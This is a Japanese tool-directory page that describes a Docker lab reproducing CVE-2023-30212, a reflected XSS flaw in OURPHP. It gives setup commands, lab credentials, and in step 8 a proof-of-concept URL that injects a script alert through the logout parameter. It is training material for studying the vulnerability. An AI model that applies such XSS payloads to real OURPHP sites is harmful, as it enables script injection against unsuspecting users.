Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-30212 — Dockerベースの脆弱なOURPHPラボ。CVE-2023-30212(反射型XSS脆弱性)を再現するためのもので、セットアップ手順と概念実証エクスプロイトURLを含む。 | Kitploit
ツール/GitHubGitHub/aash035/cve-2023-30212
コンテナセキュリティ脆弱性分析ウェブアプリケーション悪用学習と教育ラボと実践
GitHubaash035/cve-2023-30212

CVE-2023-30212

Dockerベースの脆弱なOURPHPラボ。CVE-2023-30212(反射型XSS脆弱性)を再現するためのもので、セットアップ手順と概念実証エクスプロイトURLを含む。

リポジトリを見る
133年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-30212 ラボのセットアップ

前提条件
docker.io をダウンロードする
sudo apt install -y docker.io


手順
  1. 以下のコマンドを使用して、私のリポジトリからすべてのファイルをダウンロードします。
    git clone https://github.com/AAsh035/CVE-2023-30212.git

  2. 次に、Docker イメージを作成するために以下のコマンドを実行します。
    sudo docker build -t vuln .

  3. 次に、Docker イメージをコンテナに変更します。コンテナはポート 80 で実行する必要があります。コマンドは次のとおりです。
    sudo docker run -d -p 80:80 vuln

  4. コンテナが起動しているか確認するには、次のコマンドを使用します。
    sudo docker ps

  5. ブラウザに 127.0.0.1 と入力すると、OURPHP のページが読み込まれます。

  6. 以下の内容で ourphp を設定する必要があります。
    ユーザー名 : root
    パスワード : root
    データベース名: vuln

  7. 次に、管理用のユーザー名とパスワードを設定する必要があります。以下のように設定します。
    ユーザー名: root
    パスワード: root

  8. 以下のリンクをコピーしてブラウザに貼り付けます。
    http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>

https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0

ツールをダウンロード